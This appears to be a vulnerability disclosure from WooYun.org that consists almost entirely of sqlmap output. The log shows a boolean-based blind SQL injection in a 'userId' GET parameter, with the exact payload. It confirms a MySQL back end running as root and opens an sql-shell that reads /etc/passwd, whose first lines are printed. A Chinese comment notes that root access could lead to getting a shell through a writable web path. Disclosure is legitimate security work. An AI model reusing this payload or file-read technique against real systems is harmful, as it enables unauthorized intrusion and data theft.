WooYun.org

GET parameter 'userId' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 21 HTTP(s) requests:
---
Parameter: userId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: userId=219509333' AND 9075=9075 AND 'HLmM'='HLmM&peerId=F8A45F540116004V&_t=1428930321760&callback=jsonp1
---
[02:00:23] [INFO] testing MySQL
[02:00:23] [INFO] confirming MySQL
[02:00:23] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[02:00:23] [INFO] fetching current user
[02:00:23] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:00:23] [INFO] retrieved: root@10.33.1.13
current user: 'root@10.33.1.13'
root权限注入，可以读取系统文件，如果读取到web路径（可写目录）的话可以直接getshell了
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: userId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: userId=219509333' AND 9075=9075 AND 'HLmM'='HLmM&peerId=F8A45F540116004V&_t=1428930321760&callback=jsonp1
---
[02:03:29] [INFO] testing MySQL
[02:03:29] [INFO] confirming MySQL
[02:03:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[02:03:29] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select load_file('/etc/passwd')
[02:03:39] [INFO] fetching SQL SELECT statement query output: 'select load_file('/etc/passwd')'
[02:03:39] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:03:39] [INFO] retrieved:
[02:03:40] [WARNING] reflective value(s) found and filtering out
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2: